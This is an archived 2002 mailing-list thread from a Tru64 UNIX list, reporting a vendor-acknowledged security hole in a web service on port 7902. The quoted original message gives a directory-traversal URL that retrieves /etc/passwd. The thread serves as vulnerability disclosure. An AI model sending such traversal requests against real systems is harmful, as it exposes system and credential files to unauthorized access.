[Update] Security hole in CA?!

From: Xavier Mertens (xavier@rootshell.be)
Date: Thu Sep 19 2002 - 08:09:55 EDT

• Next message: Arrigo Triulzi: "4.0G latest patches breaks long usernames?"
• Previous message: rob.leadbeater@lynx.co.uk: "Online Part Numbers"
• In reply to: Xavier: "Security hole in CA?!"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

FYI,
Compaq support acknowledged this problem as a serious security hole!
We escaladed internally.

Regards,
Xavier

--
http://www.rootshell.be
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc
On Thu, 19 Sep 2002, Xavier wrote:
> 
> Hi Gurus,
> 
> I've a box running CA (Tru64 5.1 BL17).
> I open a browser, type:
> 
> http://hostname:7902/../../../../../../etc/passwd
> 
> /etc/passwd file is downoadable!!!
> Already seen this security breach?
> 
> Xavier
> 
> --
> http://www.rootshell.be
> echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc
> 

• Next message: Arrigo Triulzi: "4.0G latest patches breaks long usernames?"
• Previous message: rob.leadbeater@lynx.co.uk: "Online Part Numbers"
• In reply to: Xavier: "Security hole in CA?!"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:48:53 EDT